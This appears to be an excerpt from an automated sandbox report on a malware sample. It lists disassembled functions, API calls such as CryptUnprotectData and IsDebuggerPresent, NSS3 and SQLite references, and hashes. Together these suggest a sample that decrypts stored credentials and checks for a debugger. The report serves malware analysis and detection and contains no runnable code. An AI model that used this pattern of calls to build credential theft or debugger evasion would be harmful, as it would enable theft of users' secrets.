                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_log$memcmp
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 717804543-598938438
                                                                                                                                              • Opcode ID: c4bcfa86b5b5fd53f60fd4deac7f7883cecd3a234511465d0dccc4814eda9310
                                                                                                                                              • Instruction ID: da07a82575ac2710d6a79aa99f8564130795733147af75f9fc0ff8aeb3fdcb87
                                                                                                                                              • Opcode Fuzzy Hash: c4bcfa86b5b5fd53f60fd4deac7f7883cecd3a234511465d0dccc4814eda9310
                                                                                                                                              • Instruction Fuzzy Hash: CE22BD716087418FC704CF29C69066AB7F1BFEA354F14CA2DE8EAA7A41D735E845CB42
                                                                                                                                              Function 0041B63A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0041BEA2
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 0041BEE5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                              • String ID: eM
                                                                                                                                              • API String ID: 2579439406-4107679315
                                                                                                                                              • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                                                                                                                              • Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
                                                                                                                                              • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                                                                                                                              • Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D
                                                                                                                                              Function 6C7D9D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C698637,?,?), ref: 6C7D9E88
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C698637), ref: 6C7D9ED6
                                                                                                                                              Strings
                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C7D9ECF
                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7D9EC0
                                                                                                                                              • database corruption, xrefs: 6C7D9ECA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 912837312-598938438
                                                                                                                                              • Opcode ID: 2eafaa49d72956760c074bba5ed6f009c4362205e9e82764812510d6e5b27828
                                                                                                                                              • Instruction ID: 82d363af36f3cf3adf0b1abcab4b806388aa89f1f293d32f91483abe052d2cdd
                                                                                                                                              • Opcode Fuzzy Hash: 2eafaa49d72956760c074bba5ed6f009c4362205e9e82764812510d6e5b27828
                                                                                                                                              • Instruction Fuzzy Hash: E381B231B001168FCB04CFA9CA94ADEB3F6EB58304F568569E819AB741EB30FD45CB91
                                                                                                                                              Function 0040A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                              • String ID: >O@
                                                                                                                                              • API String ID: 4291131564-3498640338
                                                                                                                                              • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                                                                                                                              • Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
                                                                                                                                              • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                                                                                                                              • Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50
                                                                                                                                              Function 004072A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3657800372-0
                                                                                                                                              • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                                                                                                                              • Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
                                                                                                                                              • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                                                                                                                              • Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55
                                                                                                                                              Function 6C81CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C81D086
                                                                                                                                              • PR_Malloc.NSS3(00000001), ref: 6C81D0B9
                                                                                                                                              • PR_Free.NSS3(?), ref: 6C81D138
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeMallocstrlen
                                                                                                                                              • String ID: >
                                                                                                                                              • API String ID: 1782319670-325317158
                                                                                                                                              • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                              • Instruction ID: 13a0d4a1e6cfdbd721411b9d07651db0a325c49da596010c19560afa48b01692
                                                                                                                                              • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                              • Instruction Fuzzy Hash: 03D15C62B4D54B4FEB35487C8EA13DAB7D38742374F684B3AD5218BFE6E61988438341
                                                                                                                                              Function 00413970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100comCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                              • String ID: ,<A
                                                                                                                                              • API String ID: 123533781-3158208111
                                                                                                                                              • Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                                                                                                                              • Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
                                                                                                                                              • Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                                                                                                                              • Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50
                                                                                                                                              Function 6C7BAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 15268edb5095a25797b3540a90bb25094eddd61ed620695beeee187c3d8f6be5
                                                                                                                                              • Instruction ID: a4b781b6ad608a73758e7f269b655ac748fb904b528cfdb515152e46e4c9eae0
                                                                                                                                              • Opcode Fuzzy Hash: 15268edb5095a25797b3540a90bb25094eddd61ed620695beeee187c3d8f6be5
                                                                                                                                              • Instruction Fuzzy Hash: 1FF1E071E011168FEB64CF29CA907AA77B0BB8A30CF55423DD915E7740EBB8A945CBC1
                                                                                                                                              Function 6C7EBE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: `
                                                                                                                                              • API String ID: 0-2679148245
                                                                                                                                              • Opcode ID: bfd7f69563407a0fe8e85c7a2d7c690803e131cac66719fbbf0b73acf8b2a0d5
                                                                                                                                              • Instruction ID: d19ca8e5ab7d8835e8cb3f22c6a03faa0fcfe3380b8eef3f491021f9444a0e5e
                                                                                                                                              • Opcode Fuzzy Hash: bfd7f69563407a0fe8e85c7a2d7c690803e131cac66719fbbf0b73acf8b2a0d5
                                                                                                                                              • Instruction Fuzzy Hash: E992C175A002498FDB04DF58CA80BAEBBB6FF49309F284168D815ABB91D735EC46CB54
                                                                                                                                              Function 6C683D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: htonl
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 2009864989-4108050209
                                                                                                                                              • Opcode ID: 087a2369ed756c5f4e9c8b22edbef884ce68c5b6faff197512378b6fe7e9bb58
                                                                                                                                              • Instruction ID: 762a249d0e28ccfe0ba0cbe50ab9407e5ee7950a58a1001f72367c34beb6812c
                                                                                                                                              • Opcode Fuzzy Hash: 087a2369ed756c5f4e9c8b22edbef884ce68c5b6faff197512378b6fe7e9bb58
                                                                                                                                              • Instruction Fuzzy Hash: 2A514A31E4A0798AEB25467D88683FFFBB19B82314F18433BC5A167AC0C274454787F4
                                                                                                                                              Function 6C72EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72F019
                                                                                                                                              • PK11_GenerateRandom.NSS3(?,00000000), ref: 6C72F0F9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorGenerateK11_Random
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3009229198-0
                                                                                                                                              • Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                              • Instruction ID: 9d4f4f22ab7c6869e5c78ffde2ec36101de8e4754b38b9c0ab9350ac5e91c9f2
                                                                                                                                              • Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                              • Instruction Fuzzy Hash: 92918E71E0062A8BCB14CF68C9916AEB7F1FF85324F24462DD962A7BC1D734A905CB61
                                                                                                                                              Function 6C69AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: winUnlock$winUnlockReadLock
                                                                                                                                              • API String ID: 0-3432436631
                                                                                                                                              • Opcode ID: c5ef37e1a29e3bdb5820834266237ec9e6a973dd7dfe2273bab33ab39531fea2
                                                                                                                                              • Instruction ID: fd2a494eda0c87c5e88903445edb87bd2e87ea7d47a3e0ceb37b198bdbe7e72d
                                                                                                                                              • Opcode Fuzzy Hash: c5ef37e1a29e3bdb5820834266237ec9e6a973dd7dfe2273bab33ab39531fea2
                                                                                                                                              • Instruction Fuzzy Hash: 587191706083019FDB54CF28D894AABBBF5FF89318F14C629F98997242D734A985CBC1
                                                                                                                                              Function 6C75ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C75EE3D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
